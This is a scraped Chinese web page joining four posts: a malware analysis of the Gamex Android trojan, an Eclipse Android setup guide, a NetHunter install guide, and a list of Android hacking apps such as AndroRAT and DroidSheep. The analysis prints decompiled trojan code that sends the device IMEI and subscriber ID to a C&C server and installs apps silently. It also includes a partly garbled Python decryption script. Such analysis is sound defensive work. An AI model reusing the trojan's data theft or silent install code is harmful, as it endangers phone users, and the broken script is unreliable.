这个奇怪字符串的广播是用来被木马接收的,到这里捆绑部分的工作做完了,下面是木马真身上场了,将刚才解密出的logos.apk解包,使用dex2jar该干啥干啥后,查看“AndroidManifest.xml”文件发现木马没有界面,并且通过两个开机广播来运行的,如图2所示:

 

图 2

这也验证了SDBoost发送奇怪字符串广播的分析,看第一个广播接收者代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

public class B extends BroadcastReceiver

{

  public static final String q = “android.intent.action.BOOT_COMPLETED”;

  public static final String qx = “kurhjfngjhfjghdfjgjjdh”;

  public void onReceive(Context paramContext, Intent paramIntent)

  {

    if ((paramIntent.getAction().equals(“android.intent.action.BOOT_COMPLETED”)) || (paramIntent.getAction().equals(“kurhjfngjhfjghdfjgjjdh”)))

      A.b(paramContext);

  }

}

这个A.b()方法启动了Settings.class服务,这个服务里面启动了一个线程,可以找到前面分析线程的类似框架代码如下:

public void run()

  {

    try

    {

      this.this$0.d();

      sleep(30000L);

      if ((!A.a) && (A.c()) && (A.d(this.this$0)))

      {

        A.a = 1;

        Settings localSettings1 = this.this$0;

        new E(localSettings1).start();

        return;

      }

    }

    catch (InterruptedException localInterruptedException)

    {

      …

    }

  }

d()负责解码C&C(Control & Command)服务器地址并发送手机的隐私信息,解码代码为Settings的getUrl()方法,使用python解码实现为:

# -*- coding:utf-8 -*-

import sys

def decrypt2url(decryptedfile):

    f = file(decryptedfile,”r”)

    buf = f.read()

    bs = map(ord, buf) #将字节流存储为10进制的list

    sizz = len(bs)

    for i in range(0, sizz, 2):  #后面的字与前面的字交换存储

        if i >= sizz / 2 : break

        d = bs

        bs = bs[sizz – 1 – i]

        bs[sizz – 1 – i] = d

    ss = ”.join(map(chr,bs))

    bs2 = ss.split(‘,’) #用逗号分隔开

    bss = list(bs2)

    sout = ”

    for i in range(0, len(bss), 2):

        sout = sout + chr(int(bss))

    print sout

def main(filename):

    PASS = ”.join(chr(x) for x in [9, 5, 9, 8, 5]) #这个是解密的原子

    infile = file(filename,”rb”)

    outfile = file(filename[:-4]+”.txt”,”wb”)

    i = 0

    while 1:

        c = infile.read(1)

        if not c:

            break

        j = i % 5

        d = PASS[j]

        c = chr(ord(c) ^ ord(d))

        i = i + 1

        outfile.write(c)

    outfile.close()

    infile.close()

    decrypt2url(filename[:-4]+”.txt”)

if __name__ == ‘__main__’:

    main(sys.argv[1])

这段解密脚本首先将“logo.png”文件的每个字节与[9, 5, 9, 8, 5]解密原子进行异或,解出来后的内容如图3所示:

 

图 3

得到这个字符串后,将字符串首尾倒序排列一次,排列完毕后的每一个逗号分隔的数字为一个字母的ASCII码,然后取这些ASCII的偶数位得到最终的URL地址,另外,为了照顾使用JAVA的同学,解密代码我也用JAVA实现了一份,在附件中一起打包了,解密出的结果如图4所示:

 

图 4

这个网址直接访问是提示禁止的,在d()方法中,将getDeviceId()、getSubscriberId(),Build.MODEL,getApplicationInfo(str3, 128).metaData.getString(“CMP_PID”)的结果与其它字符组合得到最终的网址为“http://www.fineandroid.com/inputex/index.php?s=/Interface/keinter/a1/DeviceId/a2/SubscriberId/a3/MODEL/index/xian1234”,最后调用b(String)方法启动一个线程将信息发送出去,代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

public void run()

  {

    …

    HttpGet localHttpGet = new HttpGet(str);

    try

    {

      HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);

      if ((localHttpResponse.getStatusLine().getStatusCode() == 200) && (EntityUtils.toString(localHttpResponse.getEntity()).equals(“1”)))

      {

        SharedPreferences.Editor localEditor1 = this.this$0.getSharedPreferences(“tijiao”, 0).edit();

        SharedPreferences.Editor localEditor2 = localEditor1.putInt(“biaoji”, 1);

        boolean bool = localEditor1.commit();

      }

      return;

    }

    catch (ClientProtocolException localClientProtocolException)

    {

      …

    }

     …

  }

如果提交成功就保存到SharedPerferences中,我们构造字符串手动访问如图5所示:

 

图 5

继续回到刚才Settings.1线程,在做完这些工作后,又开始判断了,A.a判断木马是否已经运行,A.c()判断SD卡是否已经准备到位,A.d(Context)判断是否有安装“com.android.update”木马程序,如果没有安装且上面的条件满足,就开启一个E线程做工作,E线程启动就注册了两只广播接收者“android.intent.action.PACKAGE_ADDED”与“android.intent.action.PACKAGE_CHANGED”,广播接收为收到“Intent(“akjgikurhnfjghfkj”)”广播后就启动Settings.class服务,在完成这一步后,线程运行,解码出“com.android.update”木马程序,方法与上面“com.android.setting”代码是一样的,可以用前面的“decrypt_apk.py”脚本解密得出木马APK文件,解出来后调用a()方法来安装“com.android.update”木马。到这里,由B类开机广播接收者引发的木马安装与信息发送到这里就完了,看看另一个D类的开机广播接收者的代码,它的代码很简单,收到广播后,获取木马的包名,然后在a()方法中调用“pm install -r”来重新安装木马,这个“com.android.setting”木马就分析到这里,下面看看“com.android.update”。这也是Gamex木马的最核心部分,

这个“com.android.update”木马核心的启动由开机广播完成的,如图6所示:

 

图 6

广播接收者的代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

public class B extends BroadcastReceiver

{

  public static final String a = “akjgikurhnfjghfkj”;

  public static final String q = “android.intent.action.BOOT_COMPLETED”;

  public void onReceive(Context paramContext, Intent paramIntent)

  {

    if ((paramIntent.getAction().equals(“android.intent.action.BOOT_COMPLETED”)) || (paramIntent.getAction().equals(“akjgikurhnfjghfkj”)))

      A.boot(paramContext);

  }

}

在收到广播后,调用A类boot()方法启动了Updater.class服务,这个服务生了四个类来完成所有的木马工作,代码为:

public void onStart(Intent paramIntent, int paramInt)

  {

    super.onStart(paramIntent, paramInt);

    D localD = new D(this);

    this.activityThread = localD;

    F localF = new F(this);

    this.getSoftThread = localF;

    G localG = new G(this);

    this.downSoftThread = localG;

    H localH = new H(this);

    this.installSoftThread = localH;

  }

四个对象分工明确,我们慢慢来分析,第一个对象D为“卫兵”对象,负责“通风报信”的工作,在对象构造时注册了广播接收者D.1分别监听“”android.intent.action.SCREEN_OFF”与“android.intent.action.SCREEN_ON”,当后者被触发时就启动HOME进行来隐藏自己,前者被触发时就默默的收集用户安装的软件信息,步骤为D.1首先调用D对象M成员的d()方法来查询已经安装而没有运行的木马软件,M成员为D对象中的数据库查询操作对象,在D对象初始化的时候创建,接着调用D.f()方法获取正在运行的软件,并与M.d()方法返回的列表进行比较,如果找到未运行的程序,localPackageManager.getLaunchIntentForPackage(String)来获取Activity名称,并调用paramContext.startActivity(localIntent1)启动该程序,再调用M.j(String)方法来更新软件运行状态数据库,最后调用D.n(String)方法往C&C服务器发送信息,代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

public void n(String paramString)

  {

    String str1 = ((TelephonyManager)this.g.getSystemService(“phone”)).getDeviceId(); //获取IMEI

    if (str1 == null)

      str1 = “”;

    String str2 = String.valueOf(j());

    String str3 = String.valueOf(str2 + “inputex/index.php?s=/Interface/neiinter/a1/”);

    String str4 = str3 + str1 + “/nam/” + paramString;

    j(str4);

  }

j()方法用来解密Assets目录下的”icon.png”文件来获取C&C地址,依旧可以使用decrypt_url.py来解密,解密后的地址仍然是“http://www.fineandroid.com/”,组合生成URL后调用j(String)发送出去,方法与“com.android.android”是一样的,到这里,D对象就算了解了,下一个是F对象。F对象也很简单,它读取木马服务器上的木马列表,并将列表写入本地数据库中供木马查询,F.k()解得地址为“http://fineandroid.com/InstallApk/php4sam.php”,直接访问如图7所示:

 

图 7

这个木马作者是中国人,有没有?整个html内容的解读是由J.a(InputStream)完成的,这里限于篇幅就不帖出来了,最后得到的List数据是通过M.g(String,…)插入数据库的,在保存前调用了F.e(String)进行了简单的加密,我就不分析了,看看第三个G类,它负责木马的下载工作,核心的方法为loop(),首先调用M.C()检查没有下载的木马软件,如果有软件没有下载,就检查是否在WIFI环境下,如果条件都满足就new了一个P对象,后者调用K.d(String,…)开始下载,下载完成后调用M.h()设置木马的下载状态,这些工作都做完后让线程进入睡眠状态,WIFI状态下休息1分钟,非WIFI状态下休息5个小时。相应的代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

protected void loop()

  {

    NetworkInfo localNetworkInfo = ((ConnectivityManager)this.e.getSystemService(“connectivity”)).getActiveNetworkInfo();

    List localList;

    if ((localNetworkInfo != null) && (localNetworkInfo.isAvailable()) && (!this.d))

    {

      localList = this.h.c();

      if (localList.size() == 0)

        setSleepTime(60000L);  //如果没有软件要下载,就休息1分钟

    }

    while (true)

    {

      return;

      if (localNetworkInfo.getTypeName().equals(“WIFI”)) //是否在WIFI网络状态下

      {

        localIterator = localList.iterator();

        if (!localIterator.hasNext())

          continue;

        …

        Handler localHandler1 = this.f;

        new P(localContext1, str1, str2, “download/”, str3, localHandler1).start(); //开始下载

        this.d = 1;

        setSleepTime(60000L);  //下载完就休息1分钟

        continue;

      }

      …

      new P(localContext2, str4, str5, “download/”, str6, localHandler2).start();//开始下载

      this.d = 1;

      setSleepTime(18000000L); //休息5小时

      …

    }

  }

最后的H类是安装类,它没有做实质性的工作,只是隔一段时间发一生广播并更新一下已下载的木马软件状态到数据库中。到这里,整个Gamex木马就分析完了。

总结

通过对Gamex木马的分析,我们看到其中用到了代码捆绑、软件静默安装、URL提交与响应、开机广播,文件加解密等大量的代码,这些代码在Android程序员日常编码过程中是常见的,只有掌握好Android基础,把握程序的分析思路才能将Android木马看的通透。最后补上一张Gamex的流程图,方便大家理解

中国骇客云教您如何 使用Eclipse + ADT + SDK开发Android APP

1.前言

这里我们有两条路可以选,直接使用封装好的用于开发Android的ADT Bundle,或者自己进行配置 因为谷歌已经放弃了ADT的更新,官网上也取消的下载链接,这里提供谷歌放弃更新前最新版本的 ADT Bundle供大家下载!


2.直接使用打包好的Eclipse

32位版:adt-bundle-windows-x86-20140702.zip(百度网https://pan.baidu.com/s/1qYuEDRm盘) 64位版:adt-bundle-windows-x86_64-20140702.zip(Google 地址) 下载解压,然后直接跳到4.来创建一个Helloworld工程!


3.自己配置Eclipse + ADT + SDK

Eclipse可自行到Eclipse官网下载:Eclipse官方下载 而SDK和ADT可以到AndroidDevTools处下载:AndroidDevTools官网 这里给我们提供了很多Android开发相关的工具,而且不用翻墙,必备开发网站!务必Mark! 不同版本配置间可能会有一些问题!笔者用的是旧版本的(很旧),又需要的也可以下载: Eclipse:eclipse-jee-helios-win32.zip ADT:ADT-15.0.0.zip SDK:android-sdk-windows.rar 搭建流程: 1.解压Eclipse:到解压的文件夹中找到eclipse.exe运行,运行后设置工程代码的存放位置(工作空间) 2.ADT配置:依次点击菜单栏:help -> Install new software -> Add -> Local… ->选中下载加压后的ADT的文件夹 ->accept -> 重启Eclipse ->看菜单栏是否出现Android小图标如果出现表示安装完成 PS:期间可能出现一个waring,直接忽视~ 3.SDK解压配置:依次点击菜单栏:windows -> Rreferences -> Android ->选中解压的SDK包 -> OK ->打开重新验证 4.创建AVD(安卓模拟器):依次点击菜单栏:手机小图标 -> New -> 选定系统版本 -> Skin屏幕分辨率 ->设置下SD卡大小 -> 完成 ->start即可PS:第一次启动AVD的话可能很慢,需要等等~


4.第一个程序HelloWorld工程创建与运行

1.New -> Android App Project 如果找不到,可以去Other -> android找到,也是一样的: 2.然后依次输入工程信息: 新建工程填写的信息 3.运行创建好的程序 4.从模拟器上看到运行效果:


5.项目的目录结构分析

先来看下我们的工程目录图: 工程目录结构 接下来我们需要知道的部分:

  • src目录:包含App所需的全部程序代码文件,我们大多数时候都是在这里编写我们的Java代码的
  • gen目录:只关注R.java文件,它是由ADT自动产生的,里面定义了一个R类,可以看作一个id(资源编号)的字典,包含了用户界面,图形,字符串等资源的id,而我们平时使用资源也是通过R文件来调用的,同时编译器也会看这个资源列表,没有用到的资源不会被编译进去,可以为App节省空间
  • assets目录:存放资源,而且不会再R.java文件下生成资源id,需要使用AssetsManager类进行访问
  • libs目录:存放一些jar包,比如v4,v7的兼容包,又或者是第三方的一些包
  • res资源目录:存放资源的,drawable:存放图片资源;layout:存放界面的布局文件,都是XML文件; values:包含使用XML格式的参数的描述文件,如string.xml字符串,color.xml颜色,style.xml风格样式等
  • AndroidManifest.xml配置文件:系统的控制文件,用于告诉Android系统App所包含的一些基本信息,比如组件,资源,以及需要的权限,以及兼容的最低版本的SDK等

6.几个常用的视图

点击菜单栏上的:Windows -> show view打开对应的视图即可:

打开常用视图

点击other,下述是Android中一些常用的视图:

常用视图

其实主要的还是Logcat的使用,因为和Java不同,我们的App运行在虚拟机上,而我们的控制台却并不会显示相关信息,只有安装状态而已,所以我们会在Logcat上查看程序运行的日志信息:

Logcat

7.本节小结

本节我们学习了使用Eclipse搭建我们的Android开发环境,懒人版和动手搭建版,两者都可以; 接着我们又介绍了下Eclipse开发Android项目的目录结构的一些信息,在下一节中我们将深入HelloWorld工程,了解其中的代码!

中国骇客云教您如何移动渗透测试平台搭建 – NetHunter 3.0

NetHunter是一款专为渗透测试人员打造的基于CyanogenMod的android的第三方ROM(12月23日Cyanogen 的所有服务以及每晚版本更新将会于 2016 年 12 月 31 日停止)的一个内核,通过精心的设计与技术实现了一些渗透工具的移植。

现在已经出到3.0版本,NetHunter 3.0特点概述:

界面酷炫 :开机动画帅

Alt text

Alt text

功能齐全 :含有包括wifi,无线电,pc攻击的工具,外加openvpn客户端。

需求低 :只要能跑起CyanogenMod11的就可以安装。

NetHunter 3.0安装

机型

kali官方表示可以安装的机型如下:

Alt text

Alt text

ps:本文会介绍官方推荐机一加(请一加君把广告换成蜂蜜送给本熊)和一总大众机型的安装方法,个人推荐note7必要时还可以自毁:)

需求文件

  • CyanogenMod(android的第三方ROM)版本可以从11-13都可以14的最新版熊没试理论上也可以
    – 下载地址:https://download.cyanogenmod.org/(注意选择对应机型)
  • Twrp(android的第三方Recovery,主要用于卡刷)版本最新就可以
    – 下载地址:https://twrp.me/(注意选择对应机型)
  • Kali Nethunter Kernel(Kali Nethunter 内核)kernel-nethunter-oneplus1-marshmallow-*.zip
    – 下载地址:https://build.nethunter.com/nightly/
  • Kali Nethunter(Kali Nethunter ROM包)nethunter-generic-armhf-kalifs-full-rolling-*.zip
    – 下载地址: https://build.nethunter.com/nightly/
  • BusyBox(刷完内核后正常使用要用得到),这个各大apk平台和官网都有下载。

平台安装

  • 一加手机(几天前在某二手平台低价收购的)
    先要去官网下刷机程序,一加不亏为刷机小王子刷机好方便。p.s.一加万能工具包要下最新版本要不然会不成功

Alt text

安装完工具包后,手机开启usb调试模式,选择卡刷,卡刷内容选择CM系统的压缩包,刷机选项悬着双清系统和格式化System如图

Alt text
完成后进入系统开启usb调试模式,后刷写Recovery,选择自选线刷Recovery,文件选择Twrp包如图

Alt text

成功后进入如图样子

Alt text

在此之后卡刷Nethunter的两个包(ps:这里卡刷不要双清和格式化System),然后就可以开机了,进入酷炸的画面了如图。

Alt text

然后进入系统开启root(CM自带root开启功能)如图

Alt text

在这之后安装BusyBox,然后就可以正常打开Nethunter如图

Alt text

  • 其它手机
    详细内容和一加重复,就是采用官方的刷机程序刷入CM和Twrp后,使用Twrp卡刷即可。

Android渗透工具合集[中国骇客云工具下载,更多关注我们]工具中所有都有连接下载地址欢迎下载噢 ~

在这篇文章中,我们将会给大家介绍几款超级好用的Android端黑客工具,这些App不仅功能十分强大,而且使用起来也非常的简单。在这些App的帮助下,用户可以直接使用自己的Android设备来完成某些渗透测试任务。

免责声明:本文提及的安全工具和方法仅供试用及教学用途,禁止非法使用

我们的网址是www.hackerschina.org

No.1: Hackode

Hackode是时下最热门的Android端黑客工具之一,用户可以免费在Google Play应用商店中下载和安装Hackode。该工具专为渗透测试人员、白帽黑客、IT管理员和网络安全专家而设计,Hackode可以执行类似Google Hacking、网络侦察、DNS Dig和漏洞扫描等任务。Hackode不仅功能十分强大,使用简便,而且还提供了非常美观的操作界面,这一切使得Hackode成为了初学者手中的一款绝佳的Android端黑客工具。

下载地址

No.2: ApkInspector

这个项目的主要目的就是为了帮助安全分析师和逆向工程师通过一种可视化的方法编译Android数据包以及相应的DEX代码。APKInspector提供了图形化的分析功能,用户可以使用APKInspector来对恶意App进行深入地研究和分析。

ApkInspector支持分析的数据如下:

-cfg文件

-函数调用图

-静态指令

-权限分析

-Dalvik代码

-Smali代码

-Java代码

-APK信息

下载地址

No.3: zANTI

zANTI是一款移动端渗透测试工具,安全管理员只需要轻轻按下手机屏幕上的一个按钮,就可以访问到设备所在网络的底层。这种易于使用的移动端黑客工具允许信息安全管理员利用高级攻击者所使用的恶意攻击技术来对企业网络进行模拟入侵。

除此之外,zANTI可以帮助你执行类似端口扫描、中间人攻击、密码复杂性检查、DoS攻击、以及网络嗅探等任务。

下载地址

No.4: Bugtroid

Bugtroid由Bugtraq-Team负责设计和开发,它是一款极具创造力的黑客工具。它的主要特色在于,智能手机或平板电脑安装了这款apk之后,我们将能够在移动设备上直接使用超过两百款Android平台和Linux平台的专业版黑客工具。

Bugtroid一共有两个版本,即免费版【下载地址】和专业版【下载地址】。如果你想使用Bugtroid的完整功能,那么我建议你使用Bugtroid专业版(需付费¥666)。

下载地址

No.5: DroidSheep

Clipboard Image.png

DroidSheep是一款用于Web会话劫持(WebSession Hijacking/Sidejacking)的简单工具。它可以监听通过802.11无线网络标准发送的HTTP数据包,攻击者可以从这些数据包中提取出会话ID,并在网络欺诈活动中使用这些会话ID。DroidSheep可以使用libpcap来提取会话信息,并且支持WAP和WAP2。

DroidSheep的设计意图并不是为了要窃取用户身份信息或进行一些破坏性的攻击活动,而是要向外界展示出某些Web服务的安全脆弱程度。

下载地址

No.6: AndroidRat

AndroRAT是一款Android端的远程管理工具,我们可以利用这款工具远程访问或控制Web服务器。与其他的Android工具不同,它并不是直接以APK文件的形式提供的,你需要在使用AndroidSDK来编译工具源码后才能运行这个项目。除此之外,你还需要一些基本的Java编程知识来编辑和调试项目源码。通过使用AndroidRat,你可以轻松访问目标手机的联系人信息、地理位置、以及通话信息。

下载地址

No.7:Revenssis

Revenssis就是Android版的Backtrack,Revenssis渗透测试套件提供了大量实用的安全工具,这些工具包括WebApp扫描器、用于编码和解码的哈希工具、漏洞研究工具、取证工具、以及各种其他类型的网络安全插件。

下载地址

Clipboard Image.png

总结

本文所介绍的这些工具将会成为2017年最顶级的安全测试工具和黑客工具,所有的App均可以从网上免费下载获取。本文所有的内容仅供教学使用,请不要将其用于恶意目的,为此我们不承担任何责任。